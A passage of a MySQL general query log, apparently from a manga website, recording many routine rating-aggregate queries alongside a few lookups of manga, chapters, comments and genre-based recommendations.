manga_id = '102' order by created desc 330660100 Quit 330660101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330660101 Quit 330660102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330660102 Quit 330660103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330660103 Quit 330660104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330660104 Quit 330660105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330660105 Quit 330660106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330660106 Quit 330660107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330660107 Quit 330660108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330660108 Quit 330660109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330660109 Quit 330660110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330660110 Quit 330660111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330660111 Quit 330660112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330660112 Quit 330660113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330660113 Quit 330660114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330660114 Quit 330660115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330660115 Quit 330660116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330660116 Quit 330660117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330660117 Quit 330660118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330660118 Quit 330660119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330660119 Quit 330660120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330660120 Quit 330660121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330660121 Quit 330660122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330660122 Quit 330660123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330660123 Quit 330660124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330660124 Quit 330660125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330660125 Quit 330660126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330660126 Quit 330660127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330660127 Quit 330660128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330660128 Quit 330660129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330660129 Quit 330660130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330660130 Quit 330660131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330660131 Quit 330660132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330660132 Quit 330660133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330660133 Quit 330660134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330660134 Quit 330660135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330660135 Quit 330660136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330660136 Quit 330660137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330660137 Quit 330660138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330660138 Quit 330660139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330660139 Quit 330660140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330660140 Quit 330660141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330660141 Quit 330660142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330660142 Quit 330660143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330660143 Quit 330660144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330660144 Quit 330660145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330660145 Quit 330660146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330660146 Quit 330660147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330660147 Quit 330660148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330660148 Quit 330660149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330660149 Quit 330660150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330660150 Quit 330660151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330660151 Quit 330660152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330660152 Quit 330660153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330660153 Quit 330660154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330660154 Quit 330660155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330660155 Quit 330660156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330660156 Quit 330660157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330660157 Quit 330660158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330660158 Quit 330660159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330660159 Quit 330660160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330660160 Quit 330660161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330660161 Quit 330660162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330660162 Quit 330660163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330660163 Quit 330660164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330660164 Quit 330660165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330660165 Quit 330660166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330660166 Quit 330660167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330660169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660167 Quit 330660169 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'dragon-ball-super-colored-manga' 330660168 Quit 330660170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330660170 Quit 330660171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330660171 Quit 330660172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330660172 Quit 330660169 Quit 330660173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330660174 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330660173 Quit 330660175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330660175 Quit 330660176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330660176 Quit 330660177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660174 Quit 330660177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330660177 Quit 330660178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660178 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330660179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330660179 Quit 330660180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330660180 Quit 330660181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330660181 Quit 330660178 Quit 330660182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330660182 Quit 330660183 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330660184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330660184 Quit 330660185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330660185 Quit 330660186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330660186 Quit 330660187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330660187 Quit 330660188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330660188 Quit 330660189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330660189 Quit 330660190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330660190 Quit 330660191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330660191 Quit 330660192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330660192 Quit 330660193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330660193 Quit 330660194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660183 Quit 330660194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330660194 Quit 330660195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660195 Query select * FROM comments where manga_id = '20' and parent_id is null order by created desc 330660196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330660196 Quit 330660195 Quit 330660197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330660197 Quit 330660198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660198 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330660198 Quit 330660199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330660200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660200 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Action%' OR m.genres like '%Comedy%' OR m.genres like '%Martial Arts%' OR m.genres like '%Sci-Fi%' OR m.genres like '%Shounen%' OR m.genres like '%Space%' OR m.genres like '%Super Power%') where m.active = 1 group by manga_id ORDER BY sum(view) DESC 330660199 Quit 330660201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330660201 Quit 330660202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330660202 Quit 330660203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330660203 Quit 330660204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330660204 Quit 330660205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330660205 Quit 330660206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330660206 Quit 330660207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330660207 Quit 330660208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330660208 Quit 330660209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330660209 Quit 330660210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330660210 Quit 330660211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330660211 Quit 330660212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330660212 Quit 330660213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330660213 Quit 330660214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330660214 Quit 330660215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330660215 Quit 330660216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330660216 Quit 330660217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330660217 Quit 330660218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330660218 Quit 330660219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330660219 Quit 330660220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330660220 Quit 330660221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330660221 Quit 330660222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330660222 Quit 330660223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330660223 Quit 330660224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330660224 Quit 330660225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330660225 Quit 330660226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330660226 Quit 330660227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330660227 Quit 330660228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330660228 Quit 330660229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330660229 Quit 330660230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330660230 Quit 330660231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330660231 Quit 330660232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330660232 Quit 330660233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330660233 Quit 330660234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330660234 Quit 330660235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330660235 Quit 330660236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330660236 Quit 330660237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330660237 Quit 330660238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330660238 Quit 330660239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330660239 Quit 330660240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330660240 Quit 330660241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330660241 Quit 330660242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330660242 Quit 330660243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330660243 Quit 330660244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330660244 Quit 330660245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330660245 Quit 330660246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330660246 Quit 330660247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330660247 Quit 330660248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330660248 Quit 330660249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330660249 Quit 330660250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330660250 Quit 330660251 